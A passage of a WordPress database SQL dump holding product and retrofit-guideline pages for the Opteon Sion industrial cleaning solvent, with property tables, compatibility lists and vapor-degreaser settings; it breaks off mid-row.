INSERT INTO `wp_posts` VALUES (2617, 2, '2016-10-28 20:04:18', '2016-10-28 20:04:18', '<h1><strong><span style="font-size: 14.4px;">Opteon™ Sion Introduction</span></strong></h1>\nOpteon™ Sion specialty fluid is designed to meet the high solvency needs in the industrial cleaning market. Opteon™ Sion is a safe, nonflammable, and environmentally friendly solvent with no ozone depletion potential (ODP) and a low global warming potential (GWP) (&lt;15), which are all highly desirable in industrial cleaning applications like <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreasing.</a>\n\nOpteon™ Sion is a blend of proprietary fluids and trans-1, 2-dichloroethylene (t-DCE) with azeotrope-like properties. Its exceptional solvency power (KB value = 103) makes it an ideal candidate for replacement of trichloroethylene (TCE), n-propyl bromide (nPB), benzene, perchloroethylene, methylene chloride, and other strong solvency fluids, where maximum cleaning power is a requirement. Opteon™ Sion is also a great replacement option for solvents with low to mid-solvency power, such as HCFC-225, HCFC-141b, HFEs, PFCs, CFCs, and aqueous cleaners.\n\nOpteon™ Sion has the ability to clean a wide range of contaminants. The fluid features high solvency and low surface tension, which can improve the efficiency of a <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a>. Opteon™ Sion cleaning fluid is easy to use and provides reliability with hassle-free maintenance.\n<h4><strong>Opteon Sion Features and Benefits</strong></h4>\n<ul>\n 	<li>Superior cleaning performance with best solvency power in its class (KB value = 103)</li>\n 	<li>Fast drying with an optimum boiling point (47 °C [117 °F]), allows cleaned parts to be processed and used immediately</li>\n 	<li>High soil loading capacity boosts productivity by reducing equipment downtime associated with solvent change-outs</li>\n 	<li>Product maintains compositional stability during use (azeotropic-like mixture)</li>\n 	<li>Maintenance free: No stabilizer maintenance required, easy to maintain and use</li>\n 	<li>In general, existing <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreasing</a> equipment can be used with minor or no modifications. See Opteon™ Sion Retrofit Guidelines</li>\n 	<li>No surfactants needed: Removes extra washing steps to achieve residue-free cleaning</li>\n 	<li>Recyclable and reusable: Reduces cost of ownership and environmental footprint</li>\n 	<li>Nonflammable</li>\n 	<li>Low odor and toxicity</li>\n 	<li>Excellent environmental profile: Low GWP (&lt;15), no ODP</li>\n</ul>\n<h4><strong>Typical Applications</strong></h4>\n<ul>\n 	<li>Oil and grease removal</li>\n 	<li>Precision cleaning</li>\n 	<li>High solvency defluxing</li>\n 	<li>Silicone removal</li>\n 	<li><a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">Vapor degreasing </a></li>\n 	<li>Cold cleaning</li>\n</ul>\nTable 1. Physical Properties\n<table width="1379">\n<tbody>\n<tr>\n<td width="254">Property</td>\n<td style="text-align: center;" width="125">Units</td>\n<td style="text-align: center;" width="125">Opteon™Sion</td>\n<td style="text-align: center;" width="125">CFC-113</td>\n<td style="text-align: center;" width="125">HCFC-141b</td>\n<td style="text-align: center;" width="125">Novec® 72DE</td>\n<td style="text-align: center;" width="125">HCFC-225\nca/cb</td>\n<td style="text-align: center;" width="125">TCE</td>\n<td style="text-align: center;" width="125">Perc</td>\n<td style="text-align: center;" width="125">nPB</td>\n</tr>\n<tr>\n<td>Boiling Point</td>\n<td style="text-align: center;">°C</td>\n<td style="text-align: center;">47</td>\n<td style="text-align: center;">48</td>\n<td>32</td>\n<td style="text-align: center;">43</td>\n<td style="text-align: center;">54</td>\n<td style="text-align: center;">87</td>\n<td>121</td>\n<td style="text-align: center;">71</td>\n</tr>\n<tr>\n<td></td>\n<td style="text-align: center;">°F</td>\n<td style="text-align: center;">117</td>\n<td style="text-align: center;">118</td>\n<td style="text-align: center;">90</td>\n<td style="text-align: center;">109</td>\n<td style="text-align: center;">129</td>\n<td style="text-align: center;">188</td>\n<td style="text-align: center;">250</td>\n<td style="text-align: center;">160</td>\n</tr>\n<tr>\n<td>Liquid Density(1)</td>\n<td style="text-align: center;">g/cm^3</td>\n<td style="text-align: center;">1.29</td>\n<td style="text-align: center;">1.56</td>\n<td style="text-align: center;">1.23</td>\n<td style="text-align: center;">1.28</td>\n<td style="text-align: center;">1.55</td>\n<td style="text-align: center;">1.46</td>\n<td style="text-align: center;">1.62</td>\n<td style="text-align: center;">1.35</td>\n</tr>\n<tr>\n<td></td>\n<td style="text-align: center;">lb/gal</td>\n<td style="text-align: center;">10.7</td>\n<td style="text-align: center;">13</td>\n<td style="text-align: center;">10.3</td>\n<td style="text-align: center;">10.7</td>\n<td style="text-align: center;">12.9</td>\n<td style="text-align: center;">12.1</td>\n<td style="text-align: center;">13.5</td>\n<td style="text-align: center;">11.3</td>\n</tr>\n<tr>\n<td>Saturated Vapor Density(1)</td>\n<td style="text-align: center;">kg/m^3</td>\n<td style="text-align: center;">1.81</td>\n<td style="text-align: center;">3.47</td>\n<td style="text-align: center;">3.83</td>\n<td style="text-align: center;">N.D.(2)</td>\n<td style="text-align: center;">N.D.(2)</td>\n<td style="text-align: center;">4.5</td>\n<td style="text-align: center;">5.7</td>\n<td style="text-align: center;">4.24</td>\n</tr>\n<tr>\n<td></td>\n<td style="text-align: center;">lb/ft^3</td>\n<td style="text-align: center;">0.11</td>\n<td style="text-align: center;">0.21</td>\n<td style="text-align: center;">0.23</td>\n<td style="text-align: center;">N.D.(2)</td>\n<td style="text-align: center;">N.D.(2)</td>\n<td style="text-align: center;">0.27</td>\n<td style="text-align: center;">0.35</td>\n<td style="text-align: center;">0.26</td>\n</tr>\n<tr>\n<td>Surface Tension(1)</td>\n<td style="text-align: center;">Dyn/cm</td>\n<td style="text-align: center;">21</td>\n<td style="text-align: center;">17.3</td>\n<td style="text-align: center;">19.3</td>\n<td style="text-align: center;">19</td>\n<td style="text-align: center;">16.2</td>\n<td style="text-align: center;">29.5</td>\n<td style="text-align: center;">29.5</td>\n<td style="text-align: center;">25.9</td>\n</tr>\n<tr>\n<td>Vapor Pressure(1)</td>\n<td style="text-align: center;">kPa</td>\n<td style="text-align: center;">44.7</td>\n<td style="text-align: center;">44.1</td>\n<td style="text-align: center;">79.5</td>\n<td style="text-align: center;">46.7</td>\n<td style="text-align: center;">38.7</td>\n<td style="text-align: center;">8</td>\n<td style="text-align: center;">2.4</td>\n<td style="text-align: center;">20</td>\n</tr>\n<tr>\n<td></td>\n<td style="text-align: center;">psia</td>\n<td style="text-align: center;">6.5</td>\n<td style="text-align: center;">6.4</td>\n<td style="text-align: center;">11.5</td>\n<td style="text-align: center;">6.8</td>\n<td style="text-align: center;">5.6</td>\n<td style="text-align: center;">1.2</td>\n<td style="text-align: center;">0.35</td>\n<td style="text-align: center;">2.9</td>\n</tr>\n<tr>\n<td>Viscosity(1)</td>\n<td style="text-align: center;">cP</td>\n<td style="text-align: center;">0.42</td>\n<td style="text-align: center;">0.68</td>\n<td style="text-align: center;">0.43</td>\n<td style="text-align: center;">0.45</td>\n<td style="text-align: center;">0.59</td>\n<td>0.49</td>\n<td style="text-align: center;">0.75</td>\n<td style="text-align: center;">0.49</td>\n</tr>\n<tr>\n<td>Liquid Thermal Conductivity(1)</td>\n<td style="text-align: center;">mW/m-K</td>\n<td style="text-align: center;">128</td>\n<td style="text-align: center;">72.3</td>\n<td style="text-align: center;">90.6</td>\n<td style="text-align: center;">N.D.(2)</td>\n<td style="text-align: center;">N.D.(2)</td>\n<td style="text-align: center;">115.9</td>\n<td style="text-align: center;">N.D.(2)</td>\n<td style="text-align: center;">N.D.(2)</td>\n</tr>\n<tr>\n<td>Heat Capacity(1)</td>\n<td style="text-align: center;">kJ/kg °C</td>\n<td style="text-align: center;">1.069</td>\n<td style="text-align: center;">1.079</td>\n<td style="text-align: center;">1.0996</td>\n<td style="text-align: center;">N.D.(2)</td>\n<td style="text-align: center;">1.046</td>\n<td style="text-align: center;">0.962</td>\n<td style="text-align: center;">0.855</td>\n<td style="text-align: center;">1.103</td>\n</tr>\n<tr>\n<td></td>\n<td style="text-align: center;">Btu/lb °F</td>\n<td style="text-align: center;">0.26</td>\n<td style="text-align: center;">0.26</td>\n<td style="text-align: center;">0.27</td>\n<td style="text-align: center;">N.D.(2)</td>\n<td style="text-align: center;">0.25</td>\n<td style="text-align: center;">0.23</td>\n<td style="text-align: center;">0.21</td>\n<td style="text-align: center;">0.27</td>\n</tr>\n<tr>\n<td>Heat of Vaporization at Boiling Point</td>\n<td style="text-align: center;">kJ/kg</td>\n<td style="text-align: center;">280</td>\n<td style="text-align: center;">147</td>\n<td style="text-align: center;">223</td>\n<td style="text-align: center;">218</td>\n<td style="text-align: center;">145</td>\n<td style="text-align: center;">236</td>\n<td style="text-align: center;">210</td>\n<td style="text-align: center;">246</td>\n</tr>\n<tr>\n<td>KB Value</td>\n<td></td>\n<td style="text-align: center;">103</td>\n<td style="text-align: center;">31</td>\n<td style="text-align: center;">56</td>\n<td style="text-align: center;">52</td>\n<td style="text-align: center;">31</td>\n<td style="text-align: center;">129</td>\n<td style="text-align: center;">90</td>\n<td style="text-align: center;">125</td>\n</tr>\n</tbody>\n</table>\nAll data compiled was furnished from publicly available sources. (1) Values reported are at 25 °C (77 °F), unless otherwise specified. (2) N.D. refers to no reference data available.\n<h4><strong>Performance Evaluations</strong></h4>\nOpteon™ Sion was evaluated for performance using typical coupon cleaning tests according to ASTM G122. Below are examples of the results from performance evaluations. Contact Chemours to initiate a cleaning trial in one of our regional cleaning laboratories or obtain a sample for on-site testing.\n\nTable 2. Performance Evaluations of Opteon™ Sion\n<table width="662">\n<tbody>\n<tr>\n<td width="250"></td>\n<td style="text-align: center;" width="206">Contamination Level\n(mg/cm^2)</td>\n<td style="text-align: center;" width="206">% Contamination Removed\n(avg. of 3 trials)</td>\n</tr>\n<tr>\n<td>Mineral Oil</td>\n<td style="text-align: center;">2</td>\n<td style="text-align: center;">100%</td>\n</tr>\n<tr>\n<td width="250">Hydraulic Fluid\n(MIL-PRF-83282)</td>\n<td style="text-align: center;">3.29</td>\n<td style="text-align: center;">100%</td>\n</tr>\n<tr>\n<td width="250">Grease\n(MIL-PRF-81322)</td>\n<td style="text-align: center;">16.27</td>\n<td style="text-align: center;">100%</td>\n</tr>\n</tbody>\n</table>\nOpteon™ Sion was evaluated for cleaning fluxes/residues and found effective in cleaning non-polar flux rosin residues from surface mounted technology printed circuit boards.\n<h4><strong>Solubility</strong></h4>\nOpteon™ Sion has the highest cleaning power of any cleaning fluid in its class as measured by the KB value (KB value = 103). The KB value is determined by ASTM D1133 and is a well known measurement of solvency strength. In general, the higher the KB value, the greater the cleaning power. The solubility of Opteon™ Sion for various contaminants is shown in Table 3.\n\nTable 3. Solubility of Various Contaminants in Opteon™ Sion\n<table width="456">\n<tbody>\n<tr>\n<td width="250">Contaminant</td>\n<td style="text-align: center;" width="206">Solubility</td>\n</tr>\n<tr>\n<td>Mineral</td>\n<td style="text-align: center;">Miscible</td>\n</tr>\n<tr>\n<td>Hydraulic Fluid (MIL-PRF-83282)</td>\n<td style="text-align: center;">Miscible</td>\n</tr>\n<tr>\n<td>Grease (MIL-PRF-81322)</td>\n<td style="text-align: center;">Miscible</td>\n</tr>\n<tr>\n<td>Silicone (DC-704)</td>\n<td style="text-align: center;">Miscible</td>\n</tr>\n<tr>\n<td>Skydrol®*</td>\n<td style="text-align: center;">Miscible</td>\n</tr>\n</tbody>\n</table>\n*Registered trademark of Eastman Chemical Company\n<h4><strong>Materials Compatibility</strong></h4>\nOpteon™ Sion is characterized by good compatibility with a wide selection of metals; for example, stainless steel, copper, brass, and aluminum. Opteon™ Sion is compatible with these plastics and elastomers: Teflon™ (PTFE), FEP, PFA, polyethylene, polypropylene, Nylon, Kynar, Ryton, Halar, and Kalrez®. Examples of incompatible plastics include PMMA, ABS, polycarbonate, and polystyrene. Most elastomers, including Viton™, Natural rubber, EPDM, silicone, and Hypalon®, show reversible swelling when exposed to Opteon™ Sion. Teflon™ or Teflon™ encapsulated gaskets and O-ring seals are recommended for diaphragm pumps. Individual plastic and elastomeric formulations can vary with the manufacturer; therefore, the best assurance of material compatibility can be recommended after testing under conditions expected during normal operation. Contact your local technical representative for specific material compatibility concerns.\n\nTable 4. Plastics/Elastomers Compatibility\n<table width="868">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="2" width="456">Plastics</td>\n<td style="text-align: center;" colspan="2" width="412">Elastomers</td>\n</tr>\n<tr>\n<td style="text-align: center;">Compatible</td>\n<td style="text-align: center;">Incompatible</td>\n<td style="text-align: center;">Compatible</td>\n<td style="text-align: center;">Incompatible</td>\n</tr>\n<tr>\n<td style="text-align: center;">Polyethylene</td>\n<td style="text-align: center;">Polystyrene</td>\n<td style="text-align: center;">Teflon™</td>\n<td style="text-align: center;">Silicone</td>\n</tr>\n<tr>\n<td style="text-align: center;">Polypropylene</td>\n<td style="text-align: center;">Polycarbonate</td>\n<td style="text-align: center;">Kalrez®</td>\n<td style="text-align: center;">Hypalon®</td>\n</tr>\n<tr>\n<td style="text-align: center;">Teflon™</td>\n<td style="text-align: center;">ABS</td>\n<td style="text-align: center;">Ryton</td>\n<td style="text-align: center;">EPDM Rubber</td>\n</tr>\n<tr>\n<td style="text-align: center;">Polyester</td>\n<td style="text-align: center;">Polyacrylate</td>\n<td style="text-align: center;">PTFE w/EPDM</td>\n<td style="text-align: center;">Viton™</td>\n</tr>\n<tr>\n<td style="text-align: center;">Nylon</td>\n<td style="text-align: center;">Acrylic (PMMA)</td>\n<td style="text-align: center;">PTFE w/Neoprene</td>\n<td style="text-align: center;">Buna N</td>\n</tr>\n<tr>\n<td style="text-align: center;">FEP/PFA</td>\n<td style="text-align: center;">Polysulfone</td>\n<td style="text-align: center;">Parafluor</td>\n<td style="text-align: center;">Fluorosilicone</td>\n</tr>\n<tr>\n<td style="text-align: center;">Halar</td>\n<td style="text-align: center;"></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;">Kynar</td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n</tbody>\n</table>\n<h4><strong>Safety, Toxicity, and Environmental</strong></h4>\nOpteon™ Sion exhibits no closed or open cup flash point and is classified as a nonflammable liquid by NFPA or DOT. The product is volatile; vapor may become flammable when mixed with air in the concentrations shown below. Flash point data and vapor flammability limits in air are shown in Table 5.\n\nTable 5. Safety, Toxicity, and Environmental Properties\n<table width="662">\n<tbody>\n<tr>\n<td width="250">Property</td>\n<td style="text-align: center;" width="206">Units</td>\n<td style="text-align: center;" width="206">Opteon™ Sion</td>\n</tr>\n<tr>\n<td>Flash Point, CC, ASTM D56</td>\n<td style="text-align: center;">°C (°F)</td>\n<td style="text-align: center;">None</td>\n</tr>\n<tr>\n<td>Flash Point, OC, ASTM D1310</td>\n<td style="text-align: center;">°C (°F)</td>\n<td style="text-align: center;">None</td>\n</tr>\n<tr>\n<td>Vapor Flammability Limits</td>\n<td style="text-align: center;">% Vol</td>\n<td style="text-align: center;">7.25–15.25</td>\n</tr>\n<tr>\n<td>Ozone Depletion Potential</td>\n<td style="text-align: center;">-</td>\n<td style="text-align: center;">0</td>\n</tr>\n<tr>\n<td>Global Warming Potential</td>\n<td style="text-align: center;">-</td>\n<td style="text-align: center;">&lt;15</td>\n</tr>\n<tr>\n<td>Volatile Organic Compounds (VOC)</td>\n<td style="text-align: center;">g/L</td>\n<td style="text-align: center;">1278</td>\n</tr>\n<tr>\n<td>Occupational Exposure Limit</td>\n<td style="text-align: center;">ppm</td>\n<td style="text-align: center;">201</td>\n</tr>\n</tbody>\n</table>\n<strong>Storage and Handling</strong>\n\nOpteon™ Sion is thermally stable and does not oxidize or degrade during storage. It is recommended to store containers in a clean and dry area, and protect them from freezing and excessive temperatures of 52 °C (126 °F). When stored properly, an unopened package has no shelf life. Package sizes for Opteon™ Sion are 20 kg (metal pail) and 227 kg (steel drum). Laminate film gloves are recommended when handling Opteon™ Sion.\n<h4><strong>Benefits &amp; Features</strong></h4>\nOpteon™ Sion specialty fluid features an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. As a result, it’s an ideal candidate for replacing solvents like n-propyl bromide (nPB), perchloroethylene (Perc), water (H2O), and trichloroethylene (TCE) in industrial cleaning applications.\n\nProduct performance benefits driven by designed solvent properties:\n<ul>\n 	<li>The high solvency power (KB value = 103) of Opteon™ Sion supports superior cleaning performance within its class.</li>\n 	<li>The high relative evaporation rate of Opteon™ Sion delivers fast drying cycles and immediate use of cleaned parts for further processing.</li>\n 	<li>The optimal boiling point of Opteon™ Sion translates to greater work throughput and significant reduction in cleaning equipment energy consumption.</li>\n 	<li>Opteon™ Sion supports lower cost of ownership, because of its low boiling point and ability to recycle the used solvent, which eliminates the equipment downtime associated with solvent change-outs. The low liquid density of Opteon™ Sion also guarantees more solvent volume for the same fill weight.</li>\n 	<li>Freezing point supports use in cold cleaning applications at extremely low temperatures.</li>\n 	<li>Unmatched high wetting index coupled with superior molecular volume provides excellent performance in a variety of cleaning applications.</li>\n 	<li>High exposure limits allow flexibility with cleaning process, low cost equipment selection, and worker safety.</li>\n 	<li>Opteon™ Sion is considered safe, as it is nonflammable and, therefore, not classified as an HAP.</li>\n</ul>\n<a href="https://www.miller-stephenson.com/opteon-sion-specialty-solvent/">A retrofit guideline can be found here.</a>', 'Sion', 'Opteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties.', 'inherit', 'closed', 'closed', '', '1287-autosave-v1', '', '', '2016-10-28 20:04:18', '2016-10-28 20:04:18', '', 1287, 'https://www.miller-stephenson.com/1287-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2618, 2, '2016-10-13 15:23:46', '2016-10-13 15:23:46', '<h4><strong>Introduction to <a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> Specialty Solvent</strong></h4>\r\nOpteon™ Sion specialty solvent is suitable to replace n-propyl bromide (nPB) and trichloroethylene (TCE) in applications demanding maximum cleaning power, including defluxing; oil, grease, and wax removal; and precision cleaning applications.\r\n\r\nOpteon™ Sion specialty solvent offers an excellent balance between cleaning performance, environmental impact, and safety in use:\r\n<ul>\r\n 	<li>Excellent solvency power (KB value = 100)</li>\r\n 	<li>Superior cleaning performance</li>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n 	<li>Suitable for use with ultrasonics</li>\r\n 	<li>Existing equipment can be used with no or minor modification</li>\r\n</ul>\r\n<h4><strong><span style="color: #555555; font-size: 14.4px;">Retrofit Guideline Opteo</span><span style="color: #555555; font-size: 14.4px;">n</span><span style="color: #555555; font-size: 14.4px;">™ S</span><span style="color: #555555; font-size: 14.4px;">ion - Specialty Solvent</span></strong></h4>\r\n<h4><span style="color: #555555; font-size: 14.4px;">The following provides a summary of the basic retrofit steps for Opteon™ Sion; detailed discussion of each step is provided in this bulletin.</span></h4>\r\n<ol>\r\n 	<li>Drain current solvent from the vapor degreaser system.</li>\r\n 	<li>Replace filters.</li>\r\n 	<li>Replace desiccant bags.</li>\r\n 	<li>Wipe down tank and ensure removal of any residues.</li>\r\n 	<li>Flush the liquid lines with a small amount of Opteon™ Sion.</li>\r\n 	<li>Charge tank with recommended quantity of Opteon™ Sion.</li>\r\n 	<li>Turn on heaters and pump. Adjust heater, condensing coils, and alarm set points to the recommended temperatures.</li>\r\n</ol>\r\n<strong>RETROFIT IS COMPLETE!</strong>\r\n<h4><strong>General Retrofit Information</strong></h4>\r\nSystem Modifications\r\n\r\nIn the vast majority of cases, Opteon™ Sion will function as a drop-in for n-propyl bromide, and no modifications to existing equipment are required. Special cases where minor equipment modifications may be required are discussed below.\r\n\r\nMaterial Compatibility\r\n\r\nOpteon™ Sion is characterized by good compatibility with a wide selection of metals, including stainless steel, copper, brass, and aluminum. Opteon™ Sion is also compatible with a wide selection of plastics and elastomers, including Teflon™ PTFE, FEP, PFA, polyethylene, polypropylene, nylon, PVDF, PPS, ECTFE, and DuPont™ Kalrez® perfluoroelastomer. Examples of incompatible plastics include acrylics, ABS, polycarbonate, and polystyrene. Most elastomers including Viton™, natural rubber, EPDM, silicone, and CSPE show reversible swelling when exposed to Opteon™ Sion. Teflon™ or Teflon™ encapsulated gaskets and O-ring seals are recommended for diaphragm pumps. Individual plastic and elastomeric formulations can vary with the manufacturer; therefore, the best assurance of material compatibility can be attained via testing under conditions expected during normal operation. Contact your local technical representative for specific material compatibility concerns.\r\n\r\nFlammability\r\n\r\nOpteon™ Sion exhibits no closed cup or open cup flash point and is classified as a nonflammable liquid. The products are volatile; if allowed to evaporate and mix with air, flammable mixtures can be produced.\r\n<h4><strong>Detailed Retrofit Procedure</strong></h4>\r\n<ol>\r\n 	<li><strong>Drain n-propyl bromide from the vapor degreaser tank.</strong> The existing charge of n-propyl bromide should be completely removed from the system and collected in a suitable vessel for recycle or disposal in accordance with local requirements. Ensure that n-propyl bromide has been drained from all tanks, liquid lines, water separators, filter holders, and any other system components that are in contact with n-propyl bromide.</li>\r\n 	<li><strong>Replace filters.</strong> Change the filter during the retrofit. Standard filters employing polypropylene or PTFE media are acceptable</li>\r\n 	<li><strong>Replace desiccant bags.</strong> Change the desiccant bags during the retrofit. Type 3A molecular sieves are recommended for use in the desiccant bags; suitable desiccant bag materials include cotton. DuPont™ Tyvek® bags are not recommended.</li>\r\n 	<li><strong>Wipe down tank, and ensure removal of any residues.</strong> The <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank should be thoroughly cleaned to ensure the removal of any residual n-propyl bromide and any residues present in the tank.</li>\r\n 	<li><strong>Flush the liquid lines with a small amount of Opteon™ Sion.</strong> Charge the <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank with a small amount of Opteon™ Sion, and flush the liquid lines; do not allow the pump to run dry during the line flushing procedure.</li>\r\n 	<li><strong>Charge tank with recommended quantity of Opteon™ Sion.</strong> Charge the vapor degreaser tank to the liquid level recommended by the manufacturer.</li>\r\n 	<li><strong>Turn on heaters and pump.</strong> Adjust heater, condensing coils, and alarm set points to the recommended temperatures. Turn on the heaters and pumps in accordance with the equipment manufacturer’s recommended procedure. Set the condensing coil temperatures in accordance with the equipment manufacturer’s recommendations. Adjust the boil sump and alarm temperatures in accordance with the equipment manufacturer’s recommendations; Chemours recommended settings are summarized below and in Table 1.</li>\r\n</ol>\r\n<strong>Cleaning optimization may require slight adjustments to the recommended initial settings, depending upon the model of vapor degreaser employed.</strong>\r\n<ul>\r\n 	<li>Boil Sump T. Set to 5 °C (41 °F) above the boiling point of the solvent chosen.</li>\r\n 	<li>High Solvent T Alarm. Set to 10 °C (50 °F) above the boiling point of the solvent chosen.</li>\r\n 	<li>High Vapor T/Coolant Failure Alarm. Set to 5 °C (41 °F) below the boiling point of the solvent chosen.</li>\r\n 	<li>Ultrasonic Tank High T Alarm. Set to not more than 90% of boiling point of the solvent chosen.</li>\r\n</ul>\r\nTable 1. Recommended Vapor Degreaser Settings for Opteon™ Sion\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Setting</td>\r\n<td style="text-align: center;" width="206">Opteon™ Sion</td>\r\n</tr>\r\n<tr>\r\n<td>Solvent Boiling Point (°C [°F])</td>\r\n<td style="text-align: center;">47 (117)</td>\r\n</tr>\r\n<tr>\r\n<td>Boil Sump T (°C [°F])</td>\r\n<td style="text-align: center;">52 (126)</td>\r\n</tr>\r\n<tr>\r\n<td>High Solvent T Alarm (°C [°F])</td>\r\n<td style="text-align: center;">57 (135)</td>\r\n</tr>\r\n<tr>\r\n<td>Coolant Failure Alarm (°C [°F])</td>\r\n<td style="text-align: center;">42 (108)</td>\r\n</tr>\r\n<tr>\r\n<td>Ultrasonic Tank High T Alarm (°C [°F])</td>\r\n<td style="text-align: center;">43 (109)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">For more information regarding Opteon™ Sion please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">For more information regarding vapor degreasing, please click here.</a>', 'Retrofit Guideline for Opteon™ Sion - Specialty Solvent', '', 'publish', 'closed', 'closed', '', 'opteon-sion-specialty-solvent', '', '', '2016-10-13 18:17:34', '2016-10-13 18:17:34', '', 0, 'https://www.miller-stephenson.com/?p=2618', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2619, 2, '2016-10-13 15:15:00', '2016-10-13 15:15:00', '', 'Specialty Solvent', '', 'inherit', 'closed', 'closed', '', 'shutterstock_310575989', '', '', '2016-10-13 15:20:35', '2016-10-13 15:20:35', '', 2618, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_310575989.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2620, 2, '2016-10-13 15:23:46', '2016-10-13 15:23:46', '<h4><strong>Introduction to <a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> Specialty Solvent</strong></h4>\r\nOpteon™ Sion specialty solvent is suitable to replace n-propyl bromide in applications demanding maximum cleaning power, including defluxing; oil, grease, and wax removal; and precision cleaning applications.\r\n\r\nOpteon™ Sion specialty solvent offers an excellent balance between cleaning performance, environmental impact, and safety in use:\r\n<ul>\r\n 	<li>Excellent solvency power (KB value = 100)</li>\r\n 	<li>Superior cleaning performance</li>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n 	<li>Suitable for use with ultrasonics</li>\r\n 	<li>Existing equipment can be used with no or minor modification</li>\r\n</ul>\r\n<h4><strong><span style="color: #555555; font-size: 14.4px;">Retrofit Guideline Opteo</span><span style="color: #555555; font-size: 14.4px;">n</span><span style="color: #555555; font-size: 14.4px;">™ S</span><span style="color: #555555; font-size: 14.4px;">ion - Specialty Solvent</span></strong></h4>\r\n<h4><span style="color: #555555; font-size: 14.4px;">The following provides a summary of the basic retrofit steps for Opteon™ Sion; detailed discussion of each step is provided in this bulletin.</span></h4>\r\n<ol>\r\n 	<li>Drain n-propyl bromide from the vapor degreaser system.</li>\r\n 	<li>Replace filters.</li>\r\n 	<li>Replace desiccant bags.</li>\r\n 	<li>Wipe down tank and ensure removal of any residues.</li>\r\n 	<li>Flush the liquid lines with a small amount of Opteon™ Sion.</li>\r\n 	<li>Charge tank with recommended quantity of Opteon™ Sion.</li>\r\n 	<li>Turn on heaters and pump. Adjust heater, condensing coils, and alarm set points to the recommended temperatures.</li>\r\n</ol>\r\n<strong>RETROFIT IS COMPLETE!</strong>\r\n<h4><strong>General Retrofit Information</strong></h4>\r\nSystem Modifications\r\n\r\nIn the vast majority of cases, Opteon™ Sion will function as a drop-in for n-propyl bromide, and no modifications to existing equipment are required. Special cases where minor equipment modifications may be required are discussed below.\r\n\r\nMaterial Compatibility\r\n\r\nOpteon™ Sion is characterized by good compatibility with a wide selection of metals, including stainless steel, copper, brass, and aluminum. Opteon™ Sion is also compatible with a wide selection of plastics and elastomers, including Teflon™ PTFE, FEP, PFA, polyethylene, polypropylene, nylon, PVDF, PPS, ECTFE, and DuPont™ Kalrez® perfluoroelastomer. Examples of incompatible plastics include acrylics, ABS, polycarbonate, and polystyrene. Most elastomers including Viton™, natural rubber, EPDM, silicone, and CSPE show reversible swelling when exposed to Opteon™ Sion. Teflon™ or Teflon™ encapsulated gaskets and O-ring seals are recommended for diaphragm pumps. Individual plastic and elastomeric formulations can vary with the manufacturer; therefore, the best assurance of material compatibility can be attained via testing under conditions expected during normal operation. Contact your local technical representative for specific material compatibility concerns.\r\n\r\nFlammability\r\n\r\nOpteon™ Sion exhibits no closed cup or open cup flash point and is classified as a nonflammable liquid. The products are volatile; if allowed to evaporate and mix with air, flammable mixtures can be produced.\r\n<h4><strong>Detailed Retrofit Procedure</strong></h4>\r\n<ol>\r\n 	<li><strong>Drain n-propyl bromide from the vapor degreaser tank.</strong> The existing charge of n-propyl bromide should be completely removed from the system and collected in a suitable vessel for recycle or disposal in accordance with local requirements. Ensure that n-propyl bromide has been drained from all tanks, liquid lines, water separators, filter holders, and any other system components that are in contact with n-propyl bromide.</li>\r\n 	<li><strong>Replace filters.</strong> Change the filter during the retrofit. Standard filters employing polypropylene or PTFE media are acceptable</li>\r\n 	<li><strong>Replace desiccant bags.</strong> Change the desiccant bags during the retrofit. Type 3A molecular sieves are recommended for use in the desiccant bags; suitable desiccant bag materials include cotton. DuPont™ Tyvek® bags are not recommended.</li>\r\n 	<li><strong>Wipe down tank, and ensure removal of any residues.</strong> The <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank should be thoroughly cleaned to ensure the removal of any residual n-propyl bromide and any residues present in the tank.</li>\r\n 	<li><strong>Flush the liquid lines with a small amount of Opteon™ Sion.</strong> Charge the <a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">vapor degreaser</a> tank with a small amount of Opteon™ Sion, and flush the liquid lines; do not allow the pump to run dry during the line flushing procedure.</li>\r\n 	<li><strong>Charge tank with recommended quantity of Opteon™ Sion.</strong> Charge the vapor degreaser tank to the liquid level recommended by the manufacturer.</li>\r\n 	<li><strong>Turn on heaters and pump.</strong> Adjust heater, condensing coils, and alarm set points to the 